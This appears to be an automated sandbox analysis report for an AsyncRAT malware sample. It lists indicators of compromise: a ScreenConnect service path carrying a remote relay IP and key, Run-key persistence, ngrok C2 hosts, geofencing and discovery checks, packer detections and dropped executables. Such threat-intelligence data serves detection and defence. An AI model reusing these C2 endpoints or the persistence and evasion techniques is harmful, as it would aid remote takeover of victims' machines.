asyncrat | fda46baacb7dcd211250fe29aaa2b1b17657961675b4d8c6415a0c3d004d00a6

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (d5299a0d-3d6e-49b5-a9fc-6142c65989a9)\ImagePath = "\"C:\\Users\\Admin\\AppData\\Local\\Apps\\2.0\\T5XACY7E.A20\\2M530MKQ.TGN\\scre..tion_25b0fbb6ef7eb094_0017.0009_ed98c29f35f5d551\\ScreenConnect.ClientService.exe\" \"?e=Support&y=Guest&h=37.221.64.46&p=8041&s=d5299a0d-3d6e-49b5-a9fc-6142c65989a9&k=BgIAAACkAABSU0ExAAgAAAEAAQBtRcOmkrgNYslRocOkTkuTyihOpi8jiGU066NYR9jBDXkHxmSQ2YVUm3s8%2fooJYnEhSV7fUNG1B5eE%2bEBaTsdMjuSy6wM5sWHiNov0I%2fCi2R8idtf7h0sRNyUXYU5mv3W%2f%2bAAUF5FVSqznlNh79hYpQ5ibv2AEsvG1v7zIzpVIe9GJKEaCyiMYnNwSkNrJyk7EHRdZqqtnkfYNP7V5qS%2f5EGwD4G1QOOnZh31YJbjAYbQ8GP%2b16XpkKKcCdOuQgGXJcCyDfk7uTR3jzS8ZKuveOcMCrYggcWYA0u%2bjDf3hxmbOoHDVTNrhlpt3R6xZaEcGEohbZJ69mglDgpaukS6e&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAodW9DhCz%2fkuN%2fCHYbz70GgAAAAACAAAAAAAQZgAAAAEAACAAAAD0fWGpqmE03K7NUBOrYhl4UeKAtQJJT2F46kqMXGJ%2b%2fwAAAAAOgAAAAAIAACAAAACZXRTMjGzqSR1pK4vIPZ4Px1O7yJJIFzVYH8mmOoeHPaAEAADCLonabK%2bmn33bf41bgv4VTJYCZYvXNKD0QLGqaWwbGztZqFmiXmoUX6ZlXdg6e2RSCvuHVSoFVZ78VdTZj3vXlvQ%2bw3bgZwYPnGMHq8aKfGg2J%2fIdEG1vTlLLtVdycWkpuAMF9F58KvxcFg7mC6OJBV9BDN1R23eMzeoT8n6FQPMKHqAwMXmccdYOpjEWqoZfcP0y63IP%2bZHfFOp42rQo5je7ziQX%2fpWwUMw2jGF7n8DJktZkZS%2fHnjC0oMp2ka7pzg801AHBJD6A8%2bhy%2b9dVHqyjS2iMnKb3Dqbbo5tU3Kh2UO75gy4fd%2fKnW911Dn8zeluCL5wgcGo%2fSHIgwvqjnFwzKMcrSprOr5zUuISdIm4rjW6Mbs1XFiLZfmcc0vzYQ1s7xo1BAJ20GvTjqTnW%2f25jKWleuR0QF6v79f6RP1X%2f7eHuhfkC04MCKPmPrcgHmCnqVEBT%2bXLPt8ZTFr4LfJ6yc2s9Yu0J1G50xqLoKRJ%2bdN2G7hwgVe4GlPEuIjpgtyZkkrjxCJR1VZg2uPKPO%2fDF6mvvAstonrrqHyfYvk%2bsarX%2bRxBX7QEkfP3T3MOmmNtfewrzgcw7%2fmUZ9S3fReE4b1JyBQX7%2bBuCY%2bkbEgiXaobR2ZSY3o%2fqG0CJuZP3xN6SziwWhIzeiNsL2KQEJRw6%2b5ReibijX0mnyiZhUFldNKJKMv0yIMJIWnw96g2p3Y%2bj%2ftOFCH2aBVPQlkLnvxO0JhsaqTPA4vAKIRMJ%2bnGKO9gyjUip0qmgNwDa%2fktlJZJO7nP15ZPqA27V7%2fnDEDiPY3W57CSDNgDzO%2b8I%2bp%2bd95I46BU5wE013NIWTy5tyRG%2bIrkDtZLOb4rA5rYsCWLzm1R%2fNQztSLoM%2fhm3Gqw2QVguFBE7I1u7YYgX9AAunvm7wkzN2I5BgR8JGqH1JvAhw5Kxf%2fOFhzvHhdsO8m2OYw5ZKlY7QWCh0TZ0i9a5wuXjma%2b0KcsE8WLGyp9qf76l7SC98cxMWE%2b1LziOOXt7C7Xr6REIDaWk%2bGZT0aRfvZ8R8rTXgx18gN6c64sdSOI1PH7K6sfnDQUNUgXqmVOfCEyZUrpGKKPn%2b%2fws9tIqDUPqWT%2fOEyVMXOzD8EtY47TAJq5STuuvsEtsJzTdRQQNiI78Pf%2byvjPksqvKwXrVi5W9epI7e%2bv3XlPmrf%2fLfU5XvD%2bO2jDUxd%2bSLC%2fCMZVB8jS5ORr8IlLLMWHrlNHYSvtOn4hJ7QZC1ZxtwqAyeyEQyKrQ3EhqKK3xq%2bHA5lKuH2sr6WaA6uCDmfM%2fS4VAWrPbg6Zh7I4h6wN7BXok8Vw4%2bo4qjsF%2bXVKsuESsi1INKUjyAqAp4ka6Jpow8PUbQFmbJjOpyZsT9qka61mvlHWWNj6oThEfCMgauyyD%2b1HyKWoVlZv8L%2bMbA9spSjcotB2%2bX7sGnuShuxqfaqykt9rW6bl4H%2bJDp63J8A9W7Asr2lHYoCJrtF%2bsYVwSzjKmb3sYboyzgqmD4HdfnSXmgbjSDuPuqpWpY5grF7kENwBX4J8kEH0hNshJnIy4IhB3gL8%2fGO4IwaFCRrKa6sDMHW0PFa6ohjHSs2IW3ycJLkAAAAAEHtb5Tv%2b%2bJ439abBq0HO%2byVJeR0ms11HLbpKsOZha65N%2fsZJpwvB%2bHPC4yKlf7kIgAFMHvSrNbbIqq4gCfD5j&r=&i=18%2f04%2fG%2ftwo\" \"1\""	ScreenConnect.ClientService.exe

.NET Reactor proctector 2 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/memory/6352-1146-0x00000000052F0000-0x0000000005360000-memory.dmp	net_reactor
behavioral1/memory/6352-1147-0x00000000053E0000-0x000000000544E000-memory.dmp	net_reactor

Checks computer location settings 2 TTPs 9 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation	vncgroups.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation	444.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation	Synaptics.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation	Synaptics.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation	._cache_Synaptics.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation	._cache_4363463463464363463463463.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation	Coc%20Coc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation	4363463463464363463463463.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\Control Panel\International\Geo\Nation	._cache_Synaptics.exe

Executes dropped EXE 29 IoCs

pid	Process
4664	._cache_4363463463464363463463463.exe
536	Synaptics.exe
5300	Synaptics.exe
3924	._cache_Synaptics.exe
1652	._cache_Synaptics.exe
5500	1804Gtwo.exe
1932	vncgroups.exe
5240	idmans.exe
876	idmans.exe
2008	idmans.exe
2920	idmans.exe
2924	idmans.exe
2232	444.exe
3352	Client-built.exe
6008	Client-built-woprkingfr.exe
4864	Client.exe
2556	ScreenConnect.WindowsClient.exe
544	ScreenConnect.ClientService.exe
3676	conhost.exe
1360	ScreenConnect.ClientService.exe
5012	ScreenConnect.WindowsClient.exe
5676	ScreenConnect.WindowsClient.exe
1664	Coc%20Coc.exe
1540	portable_util.exe
5712	setup.exe
1940	setup.exe
4584	Client-built.exe
5688	XClient.exe
780	Svchost.exe

Loads dropped DLL 16 IoCs

pid	Process
544	ScreenConnect.ClientService.exe
544	ScreenConnect.ClientService.exe
544	ScreenConnect.ClientService.exe
544	ScreenConnect.ClientService.exe
544	ScreenConnect.ClientService.exe
544	ScreenConnect.ClientService.exe
1360	ScreenConnect.ClientService.exe
1360	ScreenConnect.ClientService.exe
1360	ScreenConnect.ClientService.exe
1360	ScreenConnect.ClientService.exe
1360	ScreenConnect.ClientService.exe
1360	ScreenConnect.ClientService.exe
1360	ScreenConnect.ClientService.exe
1360	ScreenConnect.ClientService.exe
1360	ScreenConnect.ClientService.exe
1360	ScreenConnect.ClientService.exe

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral1/memory/6044-3877-0x00007FF710630000-0x00007FF71086A000-memory.dmp	vmprotect
behavioral1/memory/6044-3769-0x00007FF710630000-0x00007FF71086A000-memory.dmp	vmprotect
behavioral1/files/0x000700000002434a-3587.dat	vmprotect

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

defense_evasion privilege_escalation

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\idmans-KXQ59W = "\"C:\\ProgramData\\idmans\\idmans.exe\""	vncgroups.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\idmans-KXQ59W = "\"C:\\ProgramData\\idmans\\idmans.exe\""	idmans.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\idmans-KXQ59W = "\"C:\\ProgramData\\idmans\\idmans.exe\""	idmans.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe"	4363463463464363463463463.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\idmans-KXQ59W = "\"C:\\ProgramData\\idmans\\idmans.exe\""	vncgroups.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs

Web Service

T1102

flow	ioc
41	raw.githubusercontent.com
100	4.tcp.eu.ngrok.io
126	6.tcp.eu.ngrok.io
193	6.tcp.eu.ngrok.io
15	raw.githubusercontent.com
18	raw.githubusercontent.com
35	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
73	ip-api.com

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0008000000024364-6551.dat	autoit_exe

Drops file in System32 directory 7 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\._cache_Synaptics.exe	Synaptics.exe
File created	C:\Windows\SysWOW64\Files\vncgroups.exe	._cache_Synaptics.exe
File created	C:\Windows\SysWOW64\Files\Client-built.exe	._cache_Synaptics.exe
File created	C:\Windows\SysWOW64\Files\anquangou.exe	._cache_Synaptics.exe
File created	C:\Windows\system32\user.config	ScreenConnect.WindowsClient.exe
File opened for modification	C:\Windows\system32\user.config	ScreenConnect.WindowsClient.exe
File created	C:\Windows\SysWOW64\._cache_Synaptics.exe	Synaptics.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000024339-2077.dat	upx
behavioral1/memory/5040-2792-0x00000000000F0000-0x0000000000C2D000-memory.dmp	upx
behavioral1/memory/5040-4508-0x00000000000F0000-0x0000000000C2D000-memory.dmp	upx

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\CocCoc\Browser\Application	cmd.exe

Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs

Create Process with Token

T1134.002

pid	Process
8732	mshta.exe

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x0007000000024237-844.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
10048	1596	WerFault.exe	788

System Location Discovery: System Language Discovery 1 TTPs 16 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	._cache_Synaptics.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1804Gtwo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	conhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ScreenConnect.ClientService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	._cache_Synaptics.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vncgroups.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	444.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	._cache_4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ScreenConnect.ClientService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Synaptics.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	idmans.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	portable_util.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Synaptics.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 8 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1624	GoogleUpdate.exe
1208	PING.EXE
6328	PING.EXE
4576	PING.EXE
8900	PING.EXE
7632	PING.EXE
4796	PING.EXE
1540	PING.EXE

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ScreenConnect.WindowsClient.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ScreenConnect.WindowsClient.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
8692	timeout.exe

Gathers network information 2 TTPs 6 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

Command and Scripting Interpreter

T1059

pid	Process
7532	ipconfig.exe
9492	ipconfig.exe
4300	ipconfig.exe
9196	ipconfig.exe
3432	ipconfig.exe
7208	ipconfig.exe

Modifies data under HKEY_USERS 10 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.ClientService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.ClientService.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	4363463463464363463463463.exe
Key created	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_14a18532ba3aaa06	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\DigestValue = 8807695ee8345e37efec43cbc0874277ed9b0a66	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9\Transform = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_ed98c29f35f5d551\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92 = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\F_scre..tion_25b0fbb6ef7eb094_ec35c2610f3fb80b	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_ed98c29f35f5d551\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c3	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb = 68747470733a2f2f736967636172652e68656c702f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2f53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0009_none_4b563d129b766e28\lock!04000000ecb6570ec4140000e4130000000000000000000 = 30303030313463342c30316462623137353937316635633261	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0017.0009_ed98c29f35f5d551\PreparedForExecution = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0009_none_4b563d129b766e28	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924\lock!1400000079b7570efc0900008c080000000000000000000 = 30303030303966632c30316462623137353962313764306234	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\NonCanonicalData	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\identity = 53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\Files\ScreenConnect.WindowsClient.exe_6492277df = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0009_none_4b563d129b766e28\lock!1000000079b7570efc0900008c080000000000000000000 = 30303030303966632c30316462623137353962313764306234	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gc_scre..tion_a45aff7f83b479ac	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gi_scre..tion_25b0fbb6ef7eb094_9edfe039055229dd	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gc_scre..tion_a45aff7f83b479ac\LastRunVersion = 68747470733a2f2f736967636172652e68656c702f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2f53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Installations	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_ed98c29f35f5d551\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\Files	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\identity = 53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924\identity = 53637265656e436f6e6e6563742e436c69656e74536572766963652c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9\identity = 53637265656e436f6e6e6563742e436f72652c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_ed98c29f35f5d551\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0009_14a18532ba3aaa06\appid = 68747470733a2f2f736967636172652e68656c702f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
